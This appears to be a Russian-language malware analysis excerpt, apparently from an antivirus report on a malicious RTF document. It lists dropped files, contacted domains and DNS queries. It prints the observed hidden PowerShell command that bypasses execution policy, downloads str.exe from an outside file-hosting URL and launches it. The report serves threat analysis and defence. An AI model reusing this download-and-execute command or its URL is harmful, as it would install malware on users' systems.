Техническая информация
- https://dosya.co/a68ytqkonali/str.exe.html как %appdata%\str.exe
- %TEMP%\abctfhghgdghgh‹.sct
- %APPDATA%\str.exe
- <Текущая директория>\~wrd0000.tmp
- %TEMP%\abctfhghgdghgh‹.sct
- <PATH_SAMPLE>.rtf
- 'do##a.co':443
- 'r3.#.lencr.org':80
- 'do##a.co':443
- DNS ASK do##a.co
- DNS ASK r3.#.lencr.org
- DNS ASK st####.rapidssl.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://dosya.co/a68ytqkonali/Str.exe.html','%APPDATA%\Str.exe');Start-Proces...' (со скрытым окном)